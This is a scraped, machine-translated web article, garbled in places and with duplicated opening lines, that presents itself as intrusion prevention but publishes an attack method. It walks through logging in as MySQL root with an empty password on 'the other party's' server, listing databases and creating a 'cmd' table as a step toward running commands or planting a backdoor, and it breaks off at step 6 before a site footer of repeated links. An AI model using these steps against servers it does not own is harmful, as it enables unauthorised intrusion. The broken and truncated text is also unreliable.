How to prevent intrusion: MySQL attack methods. When the ROOT password of a MYSQL User is empty, it is a major vulnerability. There are also many methods on the internet to exploit this vulnerability. generally, it is difficult to write an ASP or PHP backdoor, and also
MYSQLWhen the user's ROOT password is empty, it is a very large vulnerability. There are also many methods on the internet to exploit this vulnerability, usually by writing an ASP or
PHPWebshells are not only troublesome, but also need to guess the Directory of the website. if the other party does not open IIS, then we can't help it ??
Later, I thought about a solution and succeeded in testing several servers with this vulnerability. The attack methods are published as follows:
1. connect to the MYSQL server of the other party
Mysql-u root-h 192.168.0.1
Mysql.exe this program is in the BIN directory where you have installed MYSQL
2. let's take a look at some databases on the server.
Mysql> show databases;
By default, MYSQL and TEST databases are installed. if you see other databases, they are user-created databases.
3. let's enter the database
Mysql> use test;
We will enter the test database.
4. check the data tables in the database.
Mysql> show tables;
By default, no table exists in test.
The following are key parts:
5. create a new table under the TEST database;
Mysql> create table a (cmd text );
Now, we have created a new table named a, which stores only one field, the field name is cmd, and the text is text.
6. insert content into the table
Http://www.bkjia.com/PHPjc/631041.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/631041.htmlTechArticleMYSQL user ROOT password is empty is a very large vulnerability, there are also a lot of methods to exploit this vulnerability on the Internet, is generally to write an ASP or PHP backdoor, not only very troublesome, and...